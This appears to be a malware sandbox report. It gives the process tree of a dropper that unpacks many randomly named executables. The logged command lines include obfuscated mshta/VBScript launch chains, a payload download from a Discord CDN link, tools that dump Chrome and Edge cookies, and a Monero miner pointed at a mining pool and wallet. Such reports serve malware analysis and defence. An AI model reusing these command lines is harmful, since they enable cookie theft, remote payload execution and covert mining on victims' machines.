| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-C4RDE.tmp\builder.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\Jo7OZ89bXUVMlrcM4raAPrDn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AC1F.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Setup (7).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (7).exe"
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv sjuMneG/lkSK2C7c/HduvQ.0.2
C:\Users\Admin\Documents\WUvO9Xb63O1oupFBU1fJHgGX.exe
"C:\Users\Admin\Documents\WUvO9Xb63O1oupFBU1fJHgGX.exe"
C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe
"C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe"
C:\Users\Admin\Documents\atrLSYVoi8cef007Wc5_rvmQ.exe
"C:\Users\Admin\Documents\atrLSYVoi8cef007Wc5_rvmQ.exe"
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
"C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe"
C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe
"C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe"
C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe
"C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe"
C:\Users\Admin\Documents\1PK75Ee7bUR5cLhxwMHcBK4D.exe
"C:\Users\Admin\Documents\1PK75Ee7bUR5cLhxwMHcBK4D.exe"
C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe
"C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe"
C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe
"C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe"
C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe
"C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe"
C:\Users\Admin\Documents\p_hy_eIl2kbt2ySV1hwTK6x5.exe
"C:\Users\Admin\Documents\p_hy_eIl2kbt2ySV1hwTK6x5.exe"
C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe
"C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe"
C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe
"C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe"
C:\Users\Admin\Documents\3U69TfgyoayjTexid7zPlzoC.exe
"C:\Users\Admin\Documents\3U69TfgyoayjTexid7zPlzoC.exe"
C:\Users\Admin\Documents\vD2iyS_Ba05Y__H4Qbjqun4a.exe
"C:\Users\Admin\Documents\vD2iyS_Ba05Y__H4Qbjqun4a.exe"
C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe
"C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe"
C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe
"C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe"
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
"C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe"
C:\Users\Admin\Documents\xdwePyVhF3a2vadLaZK8AsAE.exe
"C:\Users\Admin\Documents\xdwePyVhF3a2vadLaZK8AsAE.exe"
C:\Users\Admin\Documents\wITbbD2V3AT4HSORFrtFuP3H.exe
"C:\Users\Admin\Documents\wITbbD2V3AT4HSORFrtFuP3H.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C317.tmp\C318.tmp\C319.bat C:\Users\Admin\Documents\wITbbD2V3AT4HSORFrtFuP3H.exe"
C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
C:\Users\Admin\Documents\qwqBiRJKytgxyXwIMY_HvkCk.exe
"C:\Users\Admin\Documents\qwqBiRJKytgxyXwIMY_HvkCk.exe"
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1904 -ip 1904
C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe
"C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF """" == """" for %j iN (""C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
C:\Users\Admin\Documents\u2FK9BPxP4iW7ESUZK457cwp.exe
"C:\Users\Admin\Documents\u2FK9BPxP4iW7ESUZK457cwp.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 332
C:\Users\Admin\AppData\Local\Temp\is-BQM84.tmp\qwqBiRJKytgxyXwIMY_HvkCk.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BQM84.tmp\qwqBiRJKytgxyXwIMY_HvkCk.tmp" /SL5="$20356,138429,56832,C:\Users\Admin\Documents\qwqBiRJKytgxyXwIMY_HvkCk.exe"
C:\Users\Admin\AppData\Local\Temp\C317.tmp\C318.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\C317.tmp\C318.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "" == "" for %j iN ("C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe" ) do taskkill -im "%~NXj" -f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4596 -ip 4596
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 276
C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe
"C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe"
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\C317.tmp\C318.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\C317.tmp\C318.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 668 -ip 668
C:\Users\Admin\AppData\Local\Temp\C317.tmp\C318.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\C317.tmp\C318.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879627930865639475/DES6_6_6.exe" "DES6_6_6.exe" "" "" "" "" "" ""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 668 -s 272
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 296
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 344 -ip 344
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1476 -ip 1476
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Users\Admin\AppData\Roaming\6304551.exe
"C:\Users\Admin\AppData\Roaming\6304551.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 296
C:\Users\Admin\AppData\Roaming\2684263.exe
"C:\Users\Admin\AppData\Roaming\2684263.exe"
C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe
Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo
C:\Users\Admin\Documents\Gr1qBF8DD5Dpt4Vzo4DacFcs.exe
"C:\Users\Admin\Documents\Gr1qBF8DD5Dpt4Vzo4DacFcs.exe"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Roaming\4525299.exe
"C:\Users\Admin\AppData\Roaming\4525299.exe"
C:\Users\Admin\AppData\Roaming\8651870.exe
"C:\Users\Admin\AppData\Roaming\8651870.exe"
C:\Users\Admin\AppData\Local\Temp\18211\DES6_6_6.exe
DES6_6_6.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill -im "mUtXfmRxIl2lXYs36EcxefSC.exe" -f
C:\Users\Admin\AppData\Local\Temp\C317.tmp\C318.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\C317.tmp\C318.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF ""-PMrvgB7ejl2YIjc3PC8aTZbo"" == """" for %j iN (""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe
"C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe" -q
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 972 -ip 972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5920 -ip 5920
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 236
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 280
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "-PMrvgB7ejl2YIjc3PC8aTZbo" == "" for %j iN ("C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" ) do taskkill -im "%~NXj" -f
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
C:\Users\Admin\AppData\Local\Temp\is-OTSK0.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-OTSK0.tmp\Setup.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-T5IPI.tmp\Stats.tmp
"C:\Users\Admin\AppData\Local\Temp\is-T5IPI.tmp\Stats.tmp" /SL5="$502EC,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\HwWYSzK.F2,zgr
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-UI320.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UI320.tmp\Inlog.tmp" /SL5="$103DC,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Users\Admin\AppData\Local\Temp\is-0CGAQ.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-0CGAQ.tmp\MediaBurner2.tmp" /SL5="$2046A,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 452
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
C:\Users\Admin\AppData\Local\Temp\is-E3GU9.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-E3GU9.tmp\VPN.tmp" /SL5="$1049E,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
C:\Users\Admin\AppData\Local\Temp\is-UAMQ5.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UAMQ5.tmp\WEATHER Manager.tmp" /SL5="$20448,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\is-C4RDE.tmp\builder.exe
"C:\Users\Admin\AppData\Local\Temp\is-C4RDE.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5948 -ip 5948
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 804 -ip 804
C:\Users\Admin\AppData\Local\Temp\is-JE7NO.tmp\ultradumnibour.exe
"C:\Users\Admin\AppData\Local\Temp\is-JE7NO.tmp\ultradumnibour.exe" /S /UID=burnerch2
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 804 -s 292
C:\Users\Admin\AppData\Roaming\3516746.exe
"C:\Users\Admin\AppData\Roaming\3516746.exe"
C:\Users\Admin\AppData\Roaming\3185609.exe
"C:\Users\Admin\AppData\Roaming\3185609.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 572 -p 5640 -ip 5640
C:\Users\Admin\AppData\Roaming\2461552.exe
"C:\Users\Admin\AppData\Roaming\2461552.exe"
C:\Users\Admin\AppData\Roaming\7704475.exe
"C:\Users\Admin\AppData\Roaming\7704475.exe"
C:\Users\Admin\AppData\Roaming\6116581.exe
"C:\Users\Admin\AppData\Roaming\6116581.exe"
C:\Users\Admin\AppData\Local\Temp\tmp62C2_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp62C2_tmp.exe"
C:\Users\Admin\Documents\6npmyQYmeKqSOA6b_bjV_PdO.exe
"C:\Users\Admin\Documents\6npmyQYmeKqSOA6b_bjV_PdO.exe"
C:\Users\Admin\Documents\x_66FyQ2ECudBWJwYCpN7wfn.exe
"C:\Users\Admin\Documents\x_66FyQ2ECudBWJwYCpN7wfn.exe"
C:\Users\Admin\AppData\Local\Temp\is-HP6V7.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-HP6V7.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
C:\Users\Admin\Documents\ZGIVN8gGl0jIe5D2hXcLwZXM.exe
"C:\Users\Admin\Documents\ZGIVN8gGl0jIe5D2hXcLwZXM.exe"
C:\Users\Admin\Documents\jUpkvHPmJlEoqJuUXffNR6Hj.exe
"C:\Users\Admin\Documents\jUpkvHPmJlEoqJuUXffNR6Hj.exe"
C:\Users\Admin\Documents\NO1ZPpkrNgnYkLSRMU1PGfwM.exe
"C:\Users\Admin\Documents\NO1ZPpkrNgnYkLSRMU1PGfwM.exe"
C:\Users\Admin\Documents\rIZJ4ytlux72tUqT6sEJBGjx.exe
"C:\Users\Admin\Documents\rIZJ4ytlux72tUqT6sEJBGjx.exe"
C:\Users\Admin\Documents\Cdz7Pc85qTIaJ5hBcDc2rZgC.exe
"C:\Users\Admin\Documents\Cdz7Pc85qTIaJ5hBcDc2rZgC.exe"
C:\Users\Admin\Documents\jhDwcYdK5RiPAIK7zX1tJzEA.exe
"C:\Users\Admin\Documents\jhDwcYdK5RiPAIK7zX1tJzEA.exe"
C:\Users\Admin\Documents\Jo7OZ89bXUVMlrcM4raAPrDn.exe
"C:\Users\Admin\Documents\Jo7OZ89bXUVMlrcM4raAPrDn.exe"
C:\Users\Admin\Documents\GMN67w60Y75ZSdIVX8YgBso4.exe
"C:\Users\Admin\Documents\GMN67w60Y75ZSdIVX8YgBso4.exe"
C:\Users\Admin\Documents\7YdHrPOXZTUihT_XTC5QXXNq.exe
"C:\Users\Admin\Documents\7YdHrPOXZTUihT_XTC5QXXNq.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5640 -s 2440
C:\Users\Admin\Documents\5mwtbXnYpF593KoQDzFTuT57.exe
"C:\Users\Admin\Documents\5mwtbXnYpF593KoQDzFTuT57.exe"
C:\Users\Admin\Documents\EHuVBs2olHPTld3kRQVhmPfR.exe
"C:\Users\Admin\Documents\EHuVBs2olHPTld3kRQVhmPfR.exe"
C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe
"C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe"
C:\Users\Admin\AppData\Local\Temp\AC1F.exe
C:\Users\Admin\AppData\Local\Temp\AC1F.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\Documents\rIZJ4ytlux72tUqT6sEJBGjx.exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF """" == """" for %j iN (""C:\Users\Admin\Documents\rIZJ4ytlux72tUqT6sEJBGjx.exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe
"C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe"
C:\Users\Admin\Documents\Xln9yzydEwkGNbl5JGPq_WX8.exe
"C:\Users\Admin\Documents\Xln9yzydEwkGNbl5JGPq_WX8.exe"
C:\Users\Admin\Documents\rCeG4ZmHOb6ytuB08XY1OkzL.exe
"C:\Users\Admin\Documents\rCeG4ZmHOb6ytuB08XY1OkzL.exe"
C:\Users\Admin\Documents\RNTB49eKKssmauRCW_m9c79F.exe
"C:\Users\Admin\Documents\RNTB49eKKssmauRCW_m9c79F.exe"
C:\Users\Admin\Documents\46MxFuv5pPbqbm3tdvh8dNuv.exe
"C:\Users\Admin\Documents\46MxFuv5pPbqbm3tdvh8dNuv.exe"
C:\Users\Admin\Documents\_PK48c3vqpoBrX6WxswIz72H.exe
"C:\Users\Admin\Documents\_PK48c3vqpoBrX6WxswIz72H.exe"
C:\Users\Admin\Documents\ntJDMNRx5VTIu4t3_P3EM6tB.exe
"C:\Users\Admin\Documents\ntJDMNRx5VTIu4t3_P3EM6tB.exe"
C:\Users\Admin\Documents\rS8DTVJPDzvY5pdmMeaCTtGM.exe
"C:\Users\Admin\Documents\rS8DTVJPDzvY5pdmMeaCTtGM.exe"
C:\Users\Admin\Documents\36df74ehacftfwkeEZENknGR.exe
"C:\Users\Admin\Documents\36df74ehacftfwkeEZENknGR.exe"
C:\Users\Admin\Documents\u0fBxcPcsS7ntBcyE6V4NkFy.exe
"C:\Users\Admin\Documents\u0fBxcPcsS7ntBcyE6V4NkFy.exe"
C:\Users\Admin\Documents\qim0cCHWRJ5eDmE41veRE9DB.exe
"C:\Users\Admin\Documents\qim0cCHWRJ5eDmE41veRE9DB.exe"
C:\Users\Admin\AppData\Local\Temp\is-VE2NA.tmp\Xln9yzydEwkGNbl5JGPq_WX8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VE2NA.tmp\Xln9yzydEwkGNbl5JGPq_WX8.tmp" /SL5="$10646,138429,56832,C:\Users\Admin\Documents\Xln9yzydEwkGNbl5JGPq_WX8.exe"
C:\Users\Admin\Documents\x_66FyQ2ECudBWJwYCpN7wfn.exe
"C:\Users\Admin\Documents\x_66FyQ2ECudBWJwYCpN7wfn.exe"
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 6564 -ip 6564
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BD07.tmp\BD08.tmp\BD09.bat C:\Users\Admin\Documents\Cdz7Pc85qTIaJ5hBcDc2rZgC.exe"
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1244 -ip 1244
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 7084 -ip 7084
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\Documents\rIZJ4ytlux72tUqT6sEJBGjx.exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "" == "" for %j iN ("C:\Users\Admin\Documents\rIZJ4ytlux72tUqT6sEJBGjx.exe" ) do taskkill -im "%~NXj" -f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 7920 -ip 7920
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7084 -s 256
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 280
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6564 -s 272
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 5984 -ip 5984
C:\Users\Admin\Documents\7YdHrPOXZTUihT_XTC5QXXNq.exe
"C:\Users\Admin\Documents\7YdHrPOXZTUihT_XTC5QXXNq.exe" -q
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\taskkill.exe
taskkill -im "rIZJ4ytlux72tUqT6sEJBGjx.exe" -f
C:\Users\Admin\AppData\Local\Temp\DD33.exe
C:\Users\Admin\AppData\Local\Temp\DD33.exe
C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
